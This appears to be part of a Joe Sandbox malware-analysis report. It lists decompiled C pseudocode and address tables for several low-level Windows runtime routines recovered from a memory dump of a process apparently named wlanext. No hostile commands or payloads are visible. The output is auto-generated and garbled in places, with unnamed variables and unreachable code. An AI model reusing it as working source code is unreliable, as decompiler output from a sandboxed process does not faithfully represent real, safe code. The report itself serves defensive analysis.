                                  0x00000000
                                  0x034fef91
                                  0x034fef93
                                  0x034fefc4
                                  0x034fefc4
                                  0x034fefc4
                                  0x034fefca
                                  0x034fefd0
                                  0x034ff0a6
                                  0x00000000
                                  0x00000000
                                  0x034ff0af
                                  0x0354bb06
                                  0x0354bb0a
                                  0x034ff0b5
                                  0x034ff0b5
                                  0x034ff0b5
                                  0x034ff0b5
                                  0x00000000
                                  0x034fefd6
                                  0x034fefd9
                                  0x034ff0de
                                  0x034ff0e2
                                  0x034fefdf
                                  0x034fefdf
                                  0x034fefdf
                                  0x034fefe5
                                  0x0354bafc
                                  0x0354bafc
                                  0x034fefe5
                                  0x034fefeb
                                  0x034fefed
                                  0x034ff00f
                                  0x034ff011
                                  0x034ff01a
                                  0x034ff01d
                                  0x034ff021
                                  0x034ff028
                                  0x034ff029
                                  0x034ff029
                                  0x034ff02c
                                  0x00000000
                                  0x034ff02c
                                  0x034feff3
                                  0x034feff9
                                  0x034ff0ea
                                  0x034ff0ed
                                  0x034ff0ef
                                  0x00000000
                                  0x034ff0ef
                                  0x034ff003
                                  0x0354bb12
                                  0x034ff045
                                  0x034ff049
                                  0x034ff051
                                  0x034ff09e
                                  0x034ff0a0
                                  0x034ff0a0
                                  0x034ff09e
                                  0x034ff053
                                  0x034ff064
                                  0x034ff064
                                  0x034ff06b
                                  0x0354bb1a
                                  0x0354bb1a
                                  0x034ff071
                                  0x034ff071
                                  0x034ff07d
                                  0x034ff082
                                  0x034ff08f
                                  0x034ff08f
                                  0x034ff009
                                  0x034ff00d
                                  0x00000000
                                  0x034ff00d
                                  0x034fefd0
                                  0x034fef97
                                  0x034fefa5
                                  0x034fefaa
                                  0x00000000
                                  0x034fefac
                                  0x034fefac
                                  0x034fefac
                                  0x00000000
                                  0x034fefb2
                                  0x034ff036
                                  0x034ff03a
                                  0x034ff040
                                  0x034ff090
                                  0x00000000
                                  0x034ff092
                                  0x034ff042
                                  0x00000000
                                  0x034ff042
                                  0x034fefb7
                                  0x034fefb9
                                  0x034fefbc
                                  0x034fefb0
                                  0x034fefb0
                                  0x00000000
                                  0x034fefbe
                                  0x034fefbe
                                  0x034fefc1
                                  0x00000000
                                  0x034fefc1
                                  0x034fefbc
                                  0x034fefaa
                                  0x034fef91

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                  • Instruction ID: b6b0232c66d8afe62072f8ca7714798c35cf55ca998f0cee3b355f70ce0eae24
                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                  • Instruction Fuzzy Hash: 1F510230E04249EFDB24CB69C0C07AEFBB1AF05318F1C81AAC6559B391C375A9CAC755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B740D Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E035B740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0353D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0352F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03504620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03504620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0352F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03504620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                  0x035b740d
                                  0x035b740d
                                  0x035b7412
                                  0x035b7413
                                  0x035b7416
                                  0x035b7418
                                  0x035b741c
                                  0x035b741f
                                  0x035b7422
                                  0x035b7422
                                  0x035b7428
                                  0x035b742a
                                  0x035b742a
                                  0x035b7451
                                  0x035b7432
                                  0x035b744f
                                  0x035b744f
                                  0x00000000
                                  0x035b7434
                                  0x035b7438
                                  0x035b7443
                                  0x035b7517
                                  0x035b7517
                                  0x035b751a
                                  0x035b7535
                                  0x035b7520
                                  0x035b7527
                                  0x035b752c
                                  0x035b7531
                                  0x035b7533
                                  0x00000000
                                  0x035b7533
                                  0x00000000
                                  0x035b7531
                                  0x035b754b
                                  0x035b754f
                                  0x035b755c
                                  0x035b755c
                                  0x035b755f
                                  0x035b7560
                                  0x035b7561
                                  0x035b7562
                                  0x035b7563
                                  0x035b7568
                                  0x035b756a
                                  0x035b756c
                                  0x035b756d
                                  0x035b756d
                                  0x035b756f
                                  0x035b7572
                                  0x035b7574
                                  0x035b7577
                                  0x035b757c
                                  0x035b757f
                                  0x00000000
                                  0x035b7551
                                  0x035b7551
                                  0x035b7551
                                  0x035b7553
                                  0x035b7553
                                  0x035b7449
                                  0x035b7449
                                  0x035b744c
                                  0x035b744c
                                  0x00000000
                                  0x035b744c
                                  0x035b7443
                                  0x035b750e
                                  0x035b7514
                                  0x035b7514
                                  0x035b7455
                                  0x035b7469
                                  0x035b746d
                                  0x00000000
                                  0x035b7473
                                  0x035b7473
                                  0x035b7476
                                  0x035b7480
                                  0x035b7484
                                  0x035b748e
                                  0x035b7493
                                  0x035b7493
                                  0x035b7496
                                  0x035b7499
                                  0x035b74a1
                                  0x035b74b1
                                  0x035b74b5
                                  0x00000000
                                  0x035b74bb
                                  0x035b74c1
                                  0x035b74c1
                                  0x035b74c4
                                  0x035b74c5
                                  0x035b74c6
                                  0x035b74c7
                                  0x035b74c8
                                  0x035b74cd
                                  0x00000000
                                  0x035b74d3
                                  0x035b74d3
                                  0x035b74d6
                                  0x035b74d8
                                  0x035b74db
                                  0x035b74dd
                                  0x035b74e0
                                  0x035b74e7
                                  0x035b74ee
                                  0x035b74ee
                                  0x035b74f4
                                  0x035b74f9
                                  0x00000000
                                  0x035b74fb
                                  0x035b74fb
                                  0x035b74fd
                                  0x035b7500
                                  0x035b7503
                                  0x035b7505
                                  0x035b7505
                                  0x035b74f9
                                  0x00000000
                                  0x035b74cd
                                  0x035b74b5
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                  • Instruction ID: d3b6c6d32dcd71b54af78a70d74a318998ebf79f8819e7439a61ff89335addbb
                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                  • Instruction Fuzzy Hash: 30517F71600606EFCB15CF14E580A96FBB9FF89305F19C1AAE9089F2A1E771E945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03512990 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E03512990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x35bff00);
				E0353D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x34c1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0352E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x34c1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E035651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x34c166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03512AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E034F6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03512C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E034FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03512AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03512C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03512ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0353D0D1(_t62);
				goto L28;
			}





















                                  0x03512990
                                  0x03512992
                                  0x03512997
                                  0x035129a3
                                  0x035129a6
                                  0x035129ab
                                  0x035129ad
                                  0x035129b2
                                  0x03555c80
                                  0x035129b8
                                  0x035129b8
                                  0x035129bb
                                  0x035129c0
                                  0x035129c5
                                  0x035129c6
                                  0x035129c6
                                  0x035129cb
                                  0x00000000
                                  0x00000000
                                  0x035129cd
                                  0x035129d0
                                  0x035129d9
                                  0x035129db
                                  0x035129dd
                                  0x03512a7f
                                  0x03512a84
                                  0x03512a87
                                  0x03512a89
                                  0x03555ca1
                                  0x03555ca3
                                  0x00000000
                                  0x03512a8f
                                  0x03512a8f
                                  0x00000000
                                  0x03512a8f
                                  0x00000000
                                  0x035129e3
                                  0x035129e3
                                  0x035129e3
                                  0x00000000
                                  0x035129e3
                                  0x035129dd
                                  0x00000000
                                  0x035129db
                                  0x035129e6
                                  0x035129e9
                                  0x035129eb
                                  0x035129ed
                                  0x035129f3
                                  0x035129f5
                                  0x035129f8
                                  0x035129fa
                                  0x03512a97
                                  0x03512a9a
                                  0x03512a9d
                                  0x03512add
                                  0x00000000
                                  0x03512a9f
                                  0x03512aa2
                                  0x03512aa5
                                  0x03512aa8
                                  0x03512aab
                                  0x03555cab
                                  0x03555caf
                                  0x03555cc5
                                  0x03555cda
                                  0x03555cdc
                                  0x03555cdf
                                  0x03555ce5
                                  0x00000000
                                  0x03555ceb
                                  0x03555ced
                                  0x03555cee
                                  0x00000000
                                  0x03555cee
                                  0x03555cb1
                                  0x03555cb4
                                  0x03555cb9
                                  0x03555cbb
                                  0x00000000
                                  0x03555cbd
                                  0x03555cbd
                                  0x00000000
                                  0x03555cbd
                                  0x03555cbb
                                  0x03512ab1
                                  0x03512ab1
                                  0x03512ac4
                                  0x03512ac6
                                  0x03512ac6
                                  0x00000000
                                  0x03512ac6
                                  0x03512aab
                                  0x00000000
                                  0x03512a00
                                  0x03512a09
                                  0x03512a0e
                                  0x03512a21
                                  0x03512a24
                                  0x03512a35
                                  0x03512a3a
                                  0x03512a3d
                                  0x03512a42
                                  0x03512a59
                                  0x03512a59
                                  0x03512a5c
                                  0x03512a5f
                                  0x03512a5f
                                  0x035129fa
                                  0x035129f3
                                  0x03512a64
                                  0x03512a64
                                  0x03512a6b
                                  0x03512a6b
                                  0x03512a6d
                                  0x03512a72
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a00cfacd10f866e02955bea40d49bbb6be8d4ce7561cf306e0df732a390e2c2
                                  • Instruction ID: 9a39ae6209f78e043fc6dace8351b68ded48ac7859fc82cc1f586ea61ebf8e70
                                  • Opcode Fuzzy Hash: 1a00cfacd10f866e02955bea40d49bbb6be8d4ce7561cf306e0df732a390e2c2
                                  • Instruction Fuzzy Hash: FC514A75A0020ADFEF25DF55E880ADEBBB5FF48310F088855EC15AB270D37599A2CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03514BAD Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E03514BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x35dd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E034ECC50(_t86);
					L11:
					return E0352B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x35d8504
				E03502280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0352FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0352B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03504620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E034ECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x35d8504
								E034FFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03514F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                  0x03514bad
                                  0x03514bbf
                                  0x03514bc2
                                  0x03514bc6
                                  0x03514bcd
                                  0x03514bd9
                                  0x035567fe
                                  0x03556800
                                  0x03514ccc
                                  0x03514ccd
                                  0x03514cb7
                                  0x03514cc9
                                  0x03514cc9
                                  0x03514bdf
                                  0x03514be5
                                  0x00000000
                                  0x00000000
                                  0x03514beb
                                  0x03514bef
                                  0x00000000
                                  0x00000000
                                  0x03514bf5
                                  0x03514bf9
                                  0x03514c06
                                  0x03514c0b
                                  0x03514c17
                                  0x03514c1c
                                  0x03514c1f
                                  0x03514c25
                                  0x03514c33
                                  0x03514c3d
                                  0x03514c40
                                  0x03514c43
                                  0x03514c47
                                  0x03514c4d
                                  0x03514c53
                                  0x03514c54
                                  0x03514c55
                                  0x03514c56
                                  0x03514c5b
                                  0x03514c5c
                                  0x03514c63
                                  0x03514c6b
                                  0x00000000
                                  0x00000000
                                  0x03556776
                                  0x03556784
                                  0x03556784
                                  0x0355679f
                                  0x035567a7
                                  0x035567af
                                  0x035567ce
                                  0x00000000
                                  0x035567b1
                                  0x035567b7
                                  0x035567b8
                                  0x035567c1
                                  0x035567d3
                                  0x035567d9
                                  0x035567dd
                                  0x03514c94
                                  0x03514c94
                                  0x03514c98
                                  0x03514c9c
                                  0x03514ca3
                                  0x035567f4
                                  0x035567f4
                                  0x03514cb5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03514cb5
                                  0x03514c79
                                  0x03514c7e
                                  0x03514c89
                                  0x03514c8b
                                  0x03514c8f
                                  0x03514c8f
                                  0x00000000
                                  0x03514c89
                                  0x035567c3
                                  0x00000000
                                  0x035567c3
                                  0x035567af
                                  0x03514c73
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: edab8b023efae18b92e1efc5dab0f5038fba12947544aa8f274e778db64d7e19
                                  • Instruction ID: 0876045dd0f6bf961b44298d131491275bdc44f15c59d834b4299628ba4fe855
                                  • Opcode Fuzzy Hash: edab8b023efae18b92e1efc5dab0f5038fba12947544aa8f274e778db64d7e19
                                  • Instruction Fuzzy Hash: C541E675A002299FDB20DF65D940FEEB7B8FF45740F4514A6E908AB260D734EE85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03514D3B Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E03514D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x35dd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0352FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x35d7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0352B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03504620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E034ECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0352B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0352F380(_t67 + 0xc, 0x34c5138, 0x10) == 0) {
								 *0x35d60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03514F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03514E70(0x35d86b0, 0x3515690, 0, 0) != 0) {
					_t46 = E034ECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                  0x03514d3b
                                  0x03514d4d
                                  0x03514d53
                                  0x03514d58
                                  0x03514d65
                                  0x03514d6c
                                  0x03514d71
                                  0x03514d77
                                  0x03514d7f
                                  0x03514d8c
                                  0x03514d8e
                                  0x03514dad
                                  0x03514db0
                                  0x03514db7
                                  0x03514db8
                                  0x03514db9
                                  0x03514dba
                                  0x03514dbb
                                  0x03514dc1
                                  0x03514dc8
                                  0x03514dcc
                                  0x03514dd5
                                  0x03514dde
                                  0x03514ddf
                                  0x03514de0
                                  0x03514de1
                                  0x03514de6
                                  0x03514de7
                                  0x03514de9
                                  0x03514df3
                                  0x00000000
                                  0x00000000
                                  0x03556c7c
                                  0x03556c8a
                                  0x03556c8a
                                  0x03556c9d
                                  0x03556ca7
                                  0x03556cac
                                  0x03556cb2
                                  0x03556cb9
                                  0x00000000
                                  0x03556cbf
                                  0x03556cbf
                                  0x00000000
                                  0x03556cbf
                                  0x03556cb9
                                  0x03514dfb
                                  0x03556ccf
                                  0x03556cd3
                                  0x03514e32
                                  0x03514e39
                                  0x03556ce0
                                  0x03556cf2
                                  0x03556cf2
                                  0x03556ce0
                                  0x03514e3f
                                  0x03514e41
                                  0x03514e51
                                  0x03514e51
